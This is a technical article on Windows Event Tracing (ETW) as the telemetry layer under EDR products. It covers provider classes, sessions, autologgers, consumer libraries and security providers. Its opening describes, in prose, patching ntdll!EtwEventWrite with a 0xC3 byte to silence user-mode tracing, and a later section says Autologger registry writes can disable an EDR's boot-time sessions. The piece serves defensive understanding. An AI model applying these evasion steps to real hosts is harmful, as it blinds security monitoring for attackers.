Event Tracing for Windows is the high-rate, kernel-buffered observability bus that every modern Windows EDR consumes. A 2007-era architectural decision -- letting eight sessions read the same provider concurrently -- is what makes multi-vendor coexistence possible on a single host. Microsoft's `Microsoft-Windows-Threat-Intelligence` provider, gated behind Protected Process Light and an ELAM-signed Antimalware certificate since the Windows 10 RS-era, fires from the kernel side of memory-modifying syscalls and survives the user-mode `EtwEventWrite` patch class that defined red-team tradecraft from 2020 to 2022. The remaining attack surface -- BYOVD-driven kernel tampering -- is structurally narrowed by the Vulnerable Driver Blocklist enabled by default since Windows 11 22H2, with the residual sub-microsecond-payload gap remaining as ETW's irreducible "observation, not enforcement" limit.

1. Why didn't the patch silence Defender?

A red-team operator drops onto a 2026 Defender [@paragmali-com-war-it]-protected box and runs the move that worked five years ago. They locate ntdll!EtwEventWrite in the calling process, write the byte 0xC3 over the function prologue, and the calling process now silently fails to emit user-mode ETW events. The .NET CLR provider goes dark. Invoke-Mimikatz loads from execute-assembly without lighting up Microsoft-Windows-DotNETRuntime. Defender catches the credential dump [@paragmali-com-and-the] anyway, four seconds later, and the operator is on a SOC analyst's screen before the shellcode finishes running.

The patch worked. The .NET tracing provider in that process is mute. Attach a debugger and disassemble the function prologue: the first byte is now 0xC3, the near-return opcode [@felixcloutier-ret] [@felixcloutier-ret], and any caller falls straight back to its return address before producing a single event. The technique is the one Adam Chester documented in March 2020 [@xpn-hiding-dotnet] [@xpn-hiding-dotnet], and to a generation of red teamers it has functioned as a near-universal ETW evasion ever since.

So why did Defender still fire?

Because Defender does not consume Microsoft-Windows-DotNETRuntime to detect a credential dump. It consumes Microsoft-Windows-Threat-Intelligence [@fluxsec-eti] [@fluxsec-eti] -- a provider whose GUID is {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, whose events fire from inside the kernel side of memory-modifying syscalls, and whose producer the user-mode patcher cannot reach. The patch operated on a ntdll trampoline. The signal Defender used was emitted from a different layer entirely.

Key idea: Modern Windows EDR is layered on ETW, and the layers fail under different attacks.

That single asymmetry -- one provider goes dark to a one-byte patch, another fires from a place the patcher cannot touch -- is the spine of this article. Around it sits a 26-year story of one Microsoft team accidentally building the substrate of every modern Windows endpoint security product.

A high-rate, kernel-buffered tracing facility built into Windows since 2000. Components called *providers* emit events tagged with a GUID; *controllers* configure trace sessions; *consumers* subscribe to live event streams or read recorded `.etl` files. ETW was designed for low-overhead developer diagnostics; it was retrofitted into the security-telemetry substrate that all modern Windows EDR products consume. A class of endpoint security product that ingests behavioural telemetry (process creation, image load, memory allocation, network connection, registry change), correlates it against detection logic, and produces alerts and response actions. On Windows, the dominant EDRs (Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Elastic Defend, Wazuh, Sysmon-plus-SIEM) all build on ETW or on the same kernel callbacks ETW exposes to the user-mode tier.

To understand why a one-byte patch silences one provider but not another, we have to go back to a Windows 2000 design decision about per-CPU ring buffers.

2. ETW in Windows 2000: the performance problem that started it all

Imagine a 1999 network-driver author. A customer's NT4 production server is corrupting packets under load and the only available instrumentation is DbgPrint. Each call serialises through a kernel debug port, costs measurable percentage points of CPU on a busy box, and ships data to whoever happens to have the kernel debugger attached. The customer says no. The bug reproduces only at production traffic levels. You cannot ship enough printf-debugging through a debug port to find it.

That is the engineering pain Insung Park and Ricky Buch's team was solving when ETW shipped with Windows 2000. Their design moves -- recorded years later in the definitive April 2007 MSDN Magazine article on the Vista upgrade [@ms-park-buch-2007] [@ms-park-buch-2007] -- still define the architecture two and a half decades later.

The first move was per-CPU ring buffers. A producer on CPU 7 writes to CPU 7's buffer with no lock contention against producers on other CPUs. Hot-path tracing on a 64-core machine does not serialise. The kernel allocates at least two buffers per logical processor [@ms-event-trace-props] [@ms-event-trace-props] so a producer can keep writing while a writer thread drains the previous buffer.

The second move was an asynchronous writer thread. The producer never blocks on disk I/O. It writes to its CPU's buffer and returns. A separate kernel thread drains buffers to file or hands them to a real-time consumer. ETW pushes the latency tax onto the consumer and the storage path, never onto the producer's hot loop.

The third move was dynamic enable and disable. Park and Buch describe the resulting capability in one sentence:

ETW gives you the ability to enable and disable logging dynamically, making it easy to perform detailed tracing in production environments without requiring reboots or application restarts. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

That sentence is the entire reason ETW could later become the EDR substrate. A producer compiles its trace points into shipping code at low cost; a controller flips them on at runtime when somebody actually wants the data. Without that property, you cannot build a security product that ships universal kernel tracing on a billion endpoints.

The fourth move was the trichotomy of providers, controllers, and consumers [@ms-etw-wdk] [@ms-etw-wdk]. Microsoft did not write ETW as an internal-only facility. From the start, third parties could write providers (driver authors instrumenting their own code), controllers (performance tools starting and stopping sessions), and consumers (analyzers reading event streams). The architecture is open by design.

A component that emits ETW events, identified by a GUID. A provider is registered with the system at runtime via the `EventRegister` API (or its predecessor `RegisterTraceGuids` for classic providers) and emits events via `EventWrite` (or `TraceEvent`). Providers ship inside Windows itself, inside Microsoft applications, and inside any third-party binary that wants to expose tracing. A component that creates, configures, enables, and stops trace sessions. Controllers select which providers a session subscribes to and at which level and keyword bitmask. The Windows Performance Recorder, `logman`, `xperf`, and every EDR's session-management code are controllers. A component that reads events from a session in real time or from an `.etl` file on disk. Consumers register a callback that the system invokes once per delivered event. The Windows Performance Analyzer, the krabsetw library, SilkETW, and every EDR's sensor process are consumers. flowchart LR Ctl[Controller
StartTrace + EnableTrace] --> Sess[Trace Session
per-session buffer pool] P1[Provider on CPU 0] --> CPU0[CPU 0 buffer] P2[Provider on CPU 1] --> CPU1[CPU 1 buffer] P3[Provider on CPU N] --> CPUN[CPU N buffer] CPU0 --> WT[Writer thread
asynchronous drain] CPU1 --> WT CPUN --> WT Sess -.governs.-> CPU0 Sess -.governs.-> CPU1 Sess -.governs.-> CPUN WT --> File[(.etl file)] WT --> RT[Real-time consumer
OpenTrace + ProcessTrace]

The original Windows 2000 implementation supported 32 trace sessions running simultaneously [@ms-etw-sessions] [@ms-etw-sessions], a number Microsoft later raised to 64 globally. ETW was framed as a developer-diagnostics facility -- the Windows Driver Kit primary still describes it that way [@ms-etw-wdk] [@ms-etw-wdk] -- and the security-telemetry use case did not exist for almost a decade.

But the design choices that made ETW good for low-overhead production diagnostics turn out to be exactly the design choices a security telemetry bus needs. Per-CPU buffers solve the multi-core throughput problem. Asynchronous writes solve the producer-latency problem. Dynamic enable solves the always-shipping-but-mostly-off problem. The trichotomy solves the third-party-extensibility problem. Twenty-five years later, every modern Windows EDR consumes telemetry through the same four primitives.Windows 2000's 32-session global cap [@ms-etw-sessions] is preserved verbatim on the modern Microsoft Learn page: "Windows 2000: Supports only 32 event tracing sessions." The cap doubled to 64 in later releases and has stayed there ever since.

The 2000-era design carried one limit, however, that turned out to matter for security: only one trace session could enable a classic provider at a time. The next ten years would be defined by the consequences.

3. The MOF era: one session, one steal, one decade of coexistence pain

In 2005, a third-party performance monitor that registered a classic provider could find itself silently disabled the moment Microsoft's wprui.exe started its own session against the same provider GUID. The first session got no error. It just stopped receiving events. That second-consumer-steals-first behavior is the architectural fact of the entire 2000-2007 era.

Microsoft Learn still documents the rule in one sentence:

Note: "Up to eight trace sessions can enable and receive events from the same manifest-based provider. However, only one trace session can enable a classic provider. If more than one trace session tries to enable a classic provider, the first session would stop receiving events when the second session enables the provider." -- Microsoft Learn, Configuring and Starting an Event Tracing Session [@ms-etw-config] [@ms-etw-config]

That single rule made multi-EDR coexistence on classic providers structurally impossible. If Defender's predecessor and a third-party HIPS both wanted real-time process events from the same classic provider, they had to fight for it. The loser got silence with no notification.

The provider class involved was MOF-based, named after the schema language that described its events.

The schema description language inherited from WBEM (Web-Based Enterprise Management). For ETW, MOF files describe each event a classic provider can emit -- field names, types, tasks, opcodes -- and are compiled into the WMI repository at install time using `mofcomp`. Consumers decode events by querying the WMI repository for the matching MOF schema. A synonym for *MOF provider*. The original ETW provider class introduced in Windows 2000. Registered with `RegisterTraceGuids`, emits events via `TraceEvent`, decoded against a MOF schema in the WMI repository. Capped at one trace session per provider.

The MOF model was workable for a single-consumer world. A performance-tuning team running an in-house tool could enable the provider, capture, and disable. As the substrate of a security stack with multiple agents on the same host, it could not work. The mid-2000s had not yet produced a "multiple agents on the same host" world, so the limit did not bite immediately. By 2007 it would.

Class	Era	Schema location	Sessions/provider	Adoption in 2026
MOF / classic	2000	WMI repository	1	Niche; mostly NT Kernel Logger
WPP	2002	`.pdb` (TMF)	1	Pervasive inside Windows internals
Manifest-based	2007 (Vista)	XML manifest	8	Dominant for security telemetry
TraceLogging	2015 (Win10)	Inline (TLV)	8	Rising for new app/service code

A handful of classic providers survived the 2007 transition and are still significant. The most important is the NT Kernel Logger [@ms-etw-sessions] [@ms-etw-sessions], the special-purpose system session that captures high-throughput kernel events: file I/O, disk I/O, registry operations, network packets. On most consumer SKUs it remains the only path to those event streams at line rate. Sysmon and most kernel-level diagnostics tools use the NT Kernel Logger or its modern descendants.The NT Kernel Logger is a system reserved logger. There is exactly one of it on a host, and the kernel itself owns the buffers. Tools that want kernel disk, file, registry, or network events at high throughput typically subscribe through it rather than through manifest providers. This is why a host can have eight Microsoft-Windows-Kernel-File consumers but cannot easily have two simultaneous full-fidelity disk I/O traces.

By 2007 Microsoft knew the one-session limit had to go. The fix shipped with Windows Vista in January 2007, and it was the central architectural decision of the entire ETW-as-EDR-substrate story.

4. Vista's eight sessions: the architectural decision that made the modern EDR endpoint possible

Park and Buch open their April 2007 MSDN Magazine article with the line that frames every later development:

On Windows Vista, ETW has gone through a major upgrade, and one of the most significant changes is the introduction of the unified event provider model and APIs. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

The new model raised the per-provider session cap from one to eight. That single number is why Defender, CrowdStrike Falcon, SentinelOne, Sysmon, and a researcher's SilkETW tap can all read Microsoft-Windows-Kernel-Process [@fireeye-silketw-launch] [@fireeye-silketw-launch] from the same host today without one of them stealing events from the others.

The Vista model also unified two things that had been separate. ETW providers wrote to per-CPU ring buffers; the Win32 Event Log was a different facility with its own writer, its own format, and its own consumers. Park and Buch describe the unification verbatim:

The new unified APIs combine logging traces and writing to the Event Viewer into one consistent, easy-to-use mechanism for event providers. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

After Vista, a single EventWrite call from a manifest-based provider lands both in the per-CPU ring buffer for ETW consumers and in the evtx channel for wevtutil and Group Policy audit consumers, depending on how the manifest's channel mappings are configured. The "Event Viewer" the user sees is now a consumer of ETW.

The Vista-era ETW provider class. The provider author writes an XML manifest enumerating events, fields, tasks, opcodes, levels, keywords, and channels. The `mc.exe` message compiler turns the manifest into a binary resource embedded in the provider binary; `wevtutil im` registers the manifest with the system at install time. At runtime the provider calls `EventRegister` once per provider GUID and `EventWrite` per event. Capped at eight trace sessions per provider. A logical destination for an event, declared in a manifest. The four standard channels are *Admin* (operational events for administrators), *Operational* (verbose events for operators), *Analytical* (high-volume events for diagnostics), and *Debug* (developer-only events). When the provider's `EventWrite` fires, the kernel demultiplexes by channel: events with channels enabled in the `evtx` configuration land in the corresponding channel log, while subscribed real-time consumers receive them through their session.

The deployment pipeline for a manifest-based provider is heavier than for a classic provider. The author writes a manifest, compiles it, embeds the resource, and runs wevtutil im at install time. Microsoft Learn calls out the distinction between provider registration and manifest installation [@ms-eventregister] [@ms-eventregister] explicitly, and notes that each process can register up to 1,024 providers [@ms-eventregister] [@ms-eventregister]. In practice few processes come close.

flowchart TD A[Author writes manifest.xml] --> B[mc.exe compiles to binary resource] B --> C[Resource embedded in provider .dll/.exe] C --> D[Installer runs wevtutil im manifest.xml] D --> E[System-wide manifest registry] F[Provider process at runtime] --> G[EventRegister GUID] G --> H[EventWrite per event] H --> I[Per-CPU ring buffer
for ETW sessions] H --> J[Channel demux
Admin / Operational / Analytical / Debug] J --> K[(.evtx log files)] I --> L[Real-time consumers] E -.decode metadata.-> L E -.decode metadata.-> K

The cap rules now read like this: eight trace sessions can enable a manifest-based provider concurrently [@ms-about-etw] [@ms-about-etw]; up to 64 sessions can run on the system at once [@ms-etw-sessions] [@ms-etw-sessions]; EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES when the per-provider cap binds [@ms-enabletraceex2] [@ms-enabletraceex2]. The 8-session number was chosen for ergonomics, not for security planning, but it is the load-bearing number in modern Windows endpoint security.

Key idea: The eight-session cap on manifest-based providers is the single architectural decision that made multi-EDR coexistence on the same Windows host possible. Without it, the second EDR to subscribe to Microsoft-Windows-Kernel-Process would silently steal events from the first.

A 2007-era driver author shipping the inaugural Microsoft-Windows-Kernel-Process provider, GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}, authored a manifest declaring ProcessStart (event ID 1), ProcessStop (event ID 2), ImageLoad (event ID 5), and so on. Defender's MsMpEng.exe could subscribe; the future CrowdStrike Falcon could subscribe; the future Sysmon could subscribe; the future SilkETW researchers could subscribe. None starves another. The Vista unification is the architectural enabler of the modern multi-EDR Windows endpoint.

With multi-consumer concurrency solved, the next problems were authoring overhead and producer integrity. Two parallel paths branched off the Vista manifest model: TraceLogging for the first, the EtwTi PPL/ELAM gate for the second.

5. Two more provider classes: WPP for the kernel tree, TraceLogging for the app tier

Vista's manifest-based providers solved coexistence and decoding, but they were heavy to deploy. Microsoft shipped two more provider classes -- one older than Vista and one younger -- that traded manifest deployment for two different kinds of simplicity.

WPP: the C-preprocessor approach

WPP -- Windows software trace PreProcessor -- predates Vista. Community references and the Park & Buch description of ETW being "abstracted into the Windows preprocessor (WPP) software tracing technology" [@ms-park-buch-2007] place its first WDK ship in the Windows XP era; no Microsoft primary pins a specific build. It became the standard tracing facility inside the Windows kernel tree itself for years. The WDK page [@ms-wpp] [@ms-wpp] frames its purpose:

"WPP software tracing supplements and enhances WMI event tracing by adding ways to simplify tracing the operation of the trace provider. It is an efficient mechanism for the trace provider to log real-time binary messages."

A WPP provider is authored in C with macros that look like printf calls. The C preprocessor expands DoTraceMessage(FlagId, "Frobnicating widget %d", widgetId) into an EventWrite call against an auto-generated provider GUID. Format strings are extracted at build time into a Trace Message Format file embedded in the binary's .pdb. The producer cost is the smallest of any ETW provider class: emitting an event is a function call plus a few stores into a buffer. There is no manifest to deploy, no XML to author.

The corresponding decode cost is the highest. A WPP event arrives at the consumer as a binary payload referencing a TMF identifier. To turn that into a human-readable message the consumer needs the producer's .pdb file. If you do not have the symbols for the binary that emitted the event, you do not know what the event means.

That decode cost is why WPP did not become the EDR substrate. Sealighter's README puts the operational consequence verbatim:

A C-preprocessor-based ETW authoring path inherited from the XP-era WDK. Format strings are extracted to a TMF resource that lives in the producer's `.pdb`. Producer cost is minimal; decode cost requires the producer's symbol files. WPP providers inherit the classic one-session-per-provider cap and are pervasively used inside Windows itself for in-tree dev-time tracing.

"WPP traces compounds the issues, providing almost no easy-to-find data about provider and their events." -- Sealighter README [@gh-sealighter] [@gh-sealighter]

WPP providers also inherit the classic one-session-per-provider cap [@ms-about-etw] [@ms-about-etw], which would have made them unworkable for multi-EDR consumption even if the decode problem were solved. So WPP became the kernel-tree internal tracing facility -- ubiquitous inside Microsoft's source tree, irrelevant outside it.

TraceLogging: schema in the payload

Eight years after Vista, in Windows 10 (2015), Microsoft shipped a parallel path that solved a different problem. TraceLogging [@ms-tracelogging-about] [@ms-tracelogging-about] keeps the eight-session cap of manifest providers but eliminates the manifest deployment burden:

"TraceLogging is a system for logging events that can be decoded without a manifest." -- Microsoft Learn, About TraceLogging [@ms-tracelogging-about] [@ms-tracelogging-about]

A TraceLogging event carries its own schema inline. The event payload is a sequence of typed-length-value triples: a one-byte type tag, a length, and the data. A consumer that has never seen the provider before can still decode the event because the names and types of every field are in the event. The provider author needs no XML manifest, no mc.exe, no wevtutil im.

The trade-off is per-event size. Inline schema strings cost bytes per event. For a high-volume provider emitting millions of events per minute, the per-event size matters and a manifest-based provider is correct. For a new component author who wants tracing without an install-time deployment dance, TraceLogging is the right answer.

A self-describing ETW provider class shipped in Windows 10. Schema is inline in each event payload as type-length-value triples; consumers decode without a manifest. Available from C/C++ via `TraceLoggingProvider.h`, from .NET via `EventSource` with `EtwSelfDescribingEventFormat`, and from WinRT via `LoggingChannel`. Inherits the eight-session cap from the manifest-based class.

TraceLogging is also the unified path across runtimes. The same self-describing payload format is emitted from native C/C++, from .NET (when an EventSource opts into EtwSelfDescribingEventFormat), and from kernel-mode drivers [@ms-tracelogging-portal] [@ms-tracelogging-portal]. A consumer using TDH (the Trace Data Helper API) decodes them without distinguishing between the runtime that emitted them.

Four classes, four trade-offs

Class	First Shipped	Schema Location	Sessions/Provider	Decode without symbols/manifest?	Best for
MOF / classic	2000	WMI repository (`mofcomp`)	1	Needs MOF	Legacy components; NT Kernel Logger
WPP	~2002	`.pdb` (TMF)	1	No -- needs producer PDB	In-tree Windows kernel dev-time tracing
Manifest-based	2007 (Vista)	XML manifest, system-installed	8	Needs installed manifest	Shipping security telemetry
TraceLogging	2015 (Win10)	Inline TLV in payload	8	Yes	New apps and services; cross-runtime

Sources for the table: [@ms-about-etw, @ms-etw-config, @ms-tracelogging-about, @ms-wpp].

For new shipping Windows components with a known event vocabulary and high volume, choose manifest-based: smallest per-event size, evtx integration, eight-consumer concurrency. For new cross-runtime open-source providers where deployment friction matters, choose TraceLogging: same eight-consumer concurrency, no XML to author, decodable everywhere. For in-source-tree dev-time tracing inside a binary you already have symbols for, WPP is fine. For new security-relevant providers, never choose classic: the one-session cap is structurally incompatible with multi-EDR coexistence.

Four provider classes, four trade-offs. But every one of them shares a structural weakness: the producer fires from inside the calling process, and any code in that process can patch the runtime entry-point and silence the provider for itself. That is the weakness Adam Chester made famous in 2020, and the one EtwTi was built to defeat.

6. Sessions, buffers, and the autologger registry: where the telemetry actually lives

Open regedit on a Windows host and navigate to HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger. You are looking at the persistence surface of every trace session that survives a reboot on this machine -- and the persistence surface every modern EDR uses to install itself.

A session is the unit ETW actually exposes to controllers. It owns a per-session pool of buffers, a writer thread, a destination (file or real-time consumer), and a list of providers it has subscribed to. The lifecycle is short. A controller fills out an EVENT_TRACE_PROPERTIES structure [@ms-event-trace-props] [@ms-event-trace-props] with a session name, buffer size, logging mode, and destination, then calls StartTrace. The kernel allocates the buffers -- at least two per logical processor [@ms-event-trace-props] [@ms-event-trace-props] -- and returns a session handle. The controller then calls EnableTraceEx2 [@ms-enabletraceex2] [@ms-enabletraceex2] for each provider it wants to subscribe to, passing EVENT_CONTROL_CODE_ENABLE_PROVIDER along with the provider GUID, level, and keyword bitmask.

If the provider's per-class session cap is already saturated, EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES. If the caller lacks the privilege to enable that provider, it returns ERROR_ACCESS_DENIED. We will see both error codes again later, on different paths.The default buffer size sweet spot is small. The Microsoft Learn primary states it explicitly: "Trace sessions with large buffers (256KB or larger) should be used only for diagnostic investigations or testing, not for production tracing." [@ms-event-trace-props] Production session buffer sizes typically sit in the 32-64KB range.

There are three logging modes. File mode writes events to a sequential .etl file on disk; the writer thread drains buffers to disk and the file grows. Circular mode writes to a fixed-size file in a circular buffer; old events are overwritten when the file fills. Real-time mode delivers events to a real-time consumer process via a kernel callback. Defender, EDR sensors, and Sysmon all use real-time mode for their hot paths; they may also write to file as a forensic backup.

A process that calls `OpenTrace` with `LogFileMode = EVENT_TRACE_REAL_TIME_MODE` and receives events live via a registered callback rather than from an `.etl` file on disk. Real-time consumers must keep up with producer rate or events are lost.

The autologger registry path is what makes a session survive a reboot. A subkey under HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\<SessionName> defines a session that the kernel starts at boot, before most user-mode services are running. Each subkey's values configure the session: BufferSize, MaximumBuffers, LogFileMode, FileName, plus a nested <SessionName>\<ProviderGuid> subkey for each provider to enable.

A registry-persisted boot-time ETW session. The kernel reads `HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\` at boot, creates the session, enables the configured providers, and begins capture before user-mode services start. Defender's Sense agent, CrowdStrike's Falcon sensor, and Sysmon's driver all install autologgers here.

Defender's DiagTrack, Microsoft-Windows-Diagnosis-PCW, the SQM kernel logger, the EventLog-Application channel autologger -- all live here (observable via logman query -ets on a stock Windows install). Third-party EDRs add their own. The Palantir CIRT taxonomy [@palantir-tampering-wayback] (about which more in section 11) frames this registry surface as the persistent-tampering target: an attacker who can write to this subtree can disable an EDR's boot-time tracing without ever interacting with the running EDR process. The events of interest never get captured because the session never starts.

There is a related concept worth naming: the Global Logger. This is a special autologger session whose configuration lives in HKLM\SYSTEM\CurrentControlSet\Control\WMI\GlobalLogger. It is the boot-time tracing path that comes online before any user-mode service, including before Sense and the EDR sensor. It exists to capture early-boot kernel events that no later session can record.

flowchart TD R[HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\] --> S1[DiagTrack-Listener] R --> S2[Defender-Listener] R --> S3[ThirdPartyEDR-Sensor] R --> SG[GlobalLogger] S2 --> S2P[Provider GUIDs subkeys] S2 --> S2C[BufferSize / MaximumBuffers / LogFileMode] S2 --> S2F[FileName=.etl path] S2P --> KS[Kernel reads at boot] S2C --> KS S2F --> KS KS --> Started[Session started before user-mode services]

Note: logman query -ets enumerates every live trace session on the host. Cross-reference against the subkeys in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ to find sessions configured to start at boot. Any unauthorised entry -- a session you do not recognise, an autologger pointed at a destination outside your EDR's data path, a provider GUID you cannot account for -- belongs in your incident response queue. We return to this in section 14.

ERROR_NO_SYSTEM_RESOURCES from EnableTraceEx2 is the runtime symptom of the eight-session cap binding [@ms-enabletraceex2]. SOC engineers debugging multi-EDR coexistence problems should look for it in their sensor's diagnostic output. Eight subscribers per manifest provider is enough for the typical Defender + third-party EDR + Sysmon + research tap arrangement, but a host running multiple research-mode tracers can saturate it.

Persistence solved: a session the OS starts at every boot. But who reads it? That requires a consumer process, and consumers are where the architecture forks along the security spectrum.

7. Consumer architecture: from `OpenTrace` to KrabsETW to a 30-line process watcher

The consumer side of ETW is mechanically simple -- three calls to open a trace, register a callback, and process events -- but the choice of library tells you almost everything about what kind of EDR you are building.

The native pattern is three Win32 calls. EnableTraceEx2 subscribes the session to a provider GUID with a level and keyword bitmask. OpenTrace returns a handle on the session for consumption. ProcessTrace blocks the calling thread, drains events from the kernel's per-CPU buffers, and dispatches each one to a registered callback. Each event arrives as an EVENT_RECORD containing a header (provider GUID, event ID, level, keyword, opcode, timestamp, process ID, thread ID) and a payload that the consumer decodes.

For manifest providers the consumer decodes via TDH (the Trace Data Helper API) against the system-installed manifest. For TraceLogging providers the consumer decodes from the inline TLV payload. For classic and WPP providers the consumer needs the MOF schema or the producer's PDB respectively.

The Win32 decoder API that turns a raw `EVENT_RECORD` payload into typed fields, using the registered manifest as the schema source. `TdhGetEventInformation` returns a `TRACE_EVENT_INFO` structure with the field names, types, and offsets; `TdhFormatProperty` extracts each field. TDH is what makes manifest events self-describing at the consumer end, even though the schema lives out of band. sequenceDiagram participant C as Consumer process participant K as Kernel ETW subsystem participant P as Provider process C->>K: StartTrace(session) C->>K: EnableTraceEx2(session, providerGuid, level, keyword) K-->>P: Provider notified to begin emitting C->>K: OpenTrace(session) K-->>C: TraceHandle C->>K: ProcessTrace(handle) [blocking] P->>K: EventWrite(payload) K-->>C: callback(EVENT_RECORD) P->>K: EventWrite(payload) K-->>C: callback(EVENT_RECORD) Note over C,K: ProcessTrace returns only when session ends

In production almost no one writes the raw three-call pattern. The library universe settled into a small set of widely-used wrappers, and the choice of wrapper maps almost one-to-one onto the kind of EDR the engineering team is building.

krabsetw [@gh-krabsetw] [@gh-krabsetw] is a Microsoft-authored C++ library that simplifies session and provider management. Its README explicitly notes the production caller: a C++/CLI wrapper called Microsoft.O365.Security.Native.ETW, "used in production by the Office 365 Security team. It's affectionately referred to as Lobsters." If you are building an in-house EDR or a security analytics pipeline in C++ on Windows, krabsetw is the default choice.

Microsoft.Diagnostics.Tracing.TraceEvent [@nuget-traceprocessing] [@nuget-traceprocessing] is the general-purpose .NET ETW library, distributed as a NuGet package and used heavily inside the .NET diagnostics community. Microsoft's separate Microsoft.Windows.EventTracing.Processing.All package is the .NET TraceProcessing API [@ms-etw-portal] [@ms-etw-portal] that the Windows engineering team uses internally to analyze ETW data from the Windows engineering system.

SilkETW [@gh-silketw] [@gh-silketw], originally released by Ruben Boonen at FireEye in March 2019 [@fireeye-silketw-launch] [@fireeye-silketw-launch] (now maintained by Mandiant), wraps Microsoft.Diagnostics.Tracing.TraceEvent to expose ETW telemetry to detection-engineering and threat-hunting workflows. SilkETW is the canonical "blue team research" consumer: the tool you reach for when you want to see what events a provider actually emits without writing C++.

Sealighter [@gh-sealighter] [@gh-sealighter], by pathtofile, is a krabsetw-wrapping C++ tool that makes multi-provider subscription and filtering tractable from a JSON config. The README states: "Sealighter leverages the feature-rich Krabs ETW Library to enable detailed filtering and triage of ETW and WPP Providers and Events." Sealighter is the canonical "red/blue team triage" consumer: more flexible than SilkETW, less code to write than raw krabsetw.

The pitfalls are universal across all four libraries. The krabsetw README spells two of them out:

"The call to 'start' on the trace object is blocking so thread management may be necessary." -- [@gh-krabsetw]

"Throwing exceptions in the event handler callback ... will cause the trace to stop processing events." -- [@gh-krabsetw]

Both have caused real production outages. An EDR that throws an unhandled exception in its event callback dies silently as an ETW consumer, and the next event the provider emits goes nowhere.The "throwing in the callback stops the trace" pitfall is the gotcha that bites every team writing their first ETW consumer. The kernel does not catch the exception; the trace simply ends. A production-quality consumer wraps every callback in try/catch (or its language equivalent) and routes failures through a side channel, not through the trace itself.

To make the structure concrete, here is what a 30-line Microsoft-Windows-Kernel-Process real-time consumer looks like, written in TypeScript pseudocode that mirrors the structure a Sealighter or krabsetw user would write:

{` // Pseudocode: the structure of a krabsetw / Sealighter consumer // for the Microsoft-Windows-Kernel-Process provider.

const KERNEL_PROCESS_GUID = "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}";

const session = new UserTraceSession("MyEdrSensor");

const provider = new Provider(KERNEL_PROCESS_GUID); provider.level = TraceLevel.Information; provider.anyKeyword = 0xFFFFFFFFFFFFFFFFn;

provider.onEvent = (event) => { try { switch (event.id) { case 1: // ProcessStart const pid = event.fields.ProcessID; const imageName = event.fields.ImageName; const cmdLine = event.fields.CommandLine; console.log(`Process start pid=${pid} image=${imageName}`); break; case 2: // ProcessStop console.log(`Process stop pid=${event.fields.ProcessID}`); break; case 5: // ImageLoad console.log(`Image load ${event.fields.ImageName} into pid=${event.fields.ProcessID}`); break; } } catch (e) { // never let an exception escape the callback sideChannelLog(e); } };

session.enable(provider); session.start(); // blocks until session.stop() is called `}

That code, in production form, is a working EDR sensor's process watcher. Every commercial Windows EDR has something with the same structure inside it.

Note: krabsetw wraps the C++ surface and is the default for production in-house EDRs. TraceEvent wraps .NET and is the default for diagnostics tooling. SilkETW exposes ETW to detection engineers without C++. Sealighter wraps krabsetw with a config file for triage. Pick the library that matches the team that will own the consumer, not the one that looks most powerful.

This is what Sysmon, Wazuh, and Elastic Defend look like under the hood -- a SYSTEM-privileged user-mode service consuming public providers. But there is one provider this code cannot subscribe to. Try it and EnableTraceEx2 returns ERROR_ACCESS_DENIED. The next two sections are about the GUID that requires a passport.

8. The security provider catalogue: what EDRs actually read

There are roughly 1,300 manifest-based providers shipped on a 2026 Windows 11 24H2 install -- the community-maintained jdu2600 inventory [@gh-jdu2600] [@gh-jdu2600] tracks the count across builds, and the repnz manifest archive [@gh-repnz] [@gh-repnz] holds byte-stable copies of the manifests for cross-version diffing. Eight of those providers carry almost all the security telemetry the EDR vendors read. This is the catalogue.

`Microsoft-Windows-Security-Auditing`

GUID {54849625-5478-4994-A5BA-3E3B0328C30D}. The audit-policy-driven Security event log producer. Event ID 4624 (logon), 4625 (failed logon), 4634 (logoff), 4688 (process create with command line) [@learn-microsoft-com-event-4688] [@ms-event-4624], 4689 (process exit), and the broader subcategory audit policy events. This is the closure for the legacy Security event log: when an administrator turns on "audit logon events" in the local security policy, this is the provider that emits the events. EDRs that consume it are reading the same stream the Event Viewer's Security log shows.

`Microsoft-Windows-Kernel-Process`

GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}. The canonical real-time process telemetry source for non-PPL EDR. Event ID 1 fires on ProcessStart with PID, parent PID, image name, command line, and SID; event ID 2 on ProcessStop; event ID 3 on thread create; event ID 4 on thread exit; event ID 5 on ImageLoad with the loaded module name and base address. SilkETW's launch post enumerates the event record format inline [@fireeye-silketw-launch] [@fireeye-silketw-launch]. This provider is widely cited in EDR community documentation as available since Windows 7, though no Microsoft primary pins the exact build.

`Microsoft-Windows-Kernel-File`, `Microsoft-Windows-Kernel-Network`, `Microsoft-Windows-Kernel-Registry`

The per-subsystem siblings of Kernel-Process. Kernel-File surfaces file open / close / read / write / delete operations with the file path and the operating PID. Kernel-Network surfaces TCP and UDP send / receive with the local and remote endpoints. Kernel-Registry surfaces registry create / open / set value / delete with the key path and value name. All three use the manifest-based class and inherit the eight-session cap. EDRs that want full-fidelity per-syscall telemetry without writing kernel callbacks subscribe to these three.

`Microsoft-Antimalware-Scan-Interface`

GUID {2A576B87-09A7-520E-C21A-4942F0271D67}, documented in the Microsoft Learn AMSI portal [@ms-amsi-portal] [@ms-amsi-portal] and surveyed in the Palantir CIRT taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback]. This is the ETW provider that surfaces AMSI scan results: a script block submitted by PowerShell, JScript, VBA, an Office macro engine, or any other AMSI client comes through here after deobfuscation. Whatever string the script engine is about to execute, the registered antimalware engine sees in plaintext, and the result of the scan is published via this provider for any listener.

